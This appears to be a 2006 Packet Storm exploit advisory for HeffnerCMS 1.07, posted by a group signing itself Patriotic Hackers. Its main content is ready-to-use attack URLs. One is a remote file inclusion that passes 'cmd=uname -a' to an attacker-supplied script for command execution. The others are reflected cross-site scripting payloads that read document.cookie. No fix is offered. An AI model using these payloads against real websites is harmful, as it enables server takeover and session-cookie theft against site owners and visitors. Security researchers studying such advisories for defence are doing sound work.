HeffnerCMS.txt

2006-04-01T00:00:00
ID PACKETSTORM:45049
Type packetstorm
Reporter Andries Bruinsma
Modified 2006-04-01T00:00:00

Description

                                        
                                            `Website : http://www.christian-heffner.de  
  
Version : 1.07  
  
I.  
  
<?php  
  
$filename="index.php";  
  
require_once 'vlib/vlibTemplate.php';  
  
$tmpl = new vlibTemplate('tmpl/std/index.tpl');  
  
require_once 'config/db_config.php';  
  
require_once 'config/pcfunctions.php';  
  
Ucuyor.... :) lol  
  
II. Vulnerable code ;  
  
  
http://www.site.com/index.php?page=evilcode.txt?&cmd=uname -a  
  
III. Cross Scripting Attack  
  
http://www.site.com/index.php?page=<script>alert(document.cookie)</script>  
  
http://www.site.com/index.php?page=<script>alert(Patriotic Hackers)</script>  
  
Etc..  
  
IV. Solution   
  
No  
  
Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends..   
  
irc.gigachat.net #kurdhack  
  
www.PatrioticHackers  
`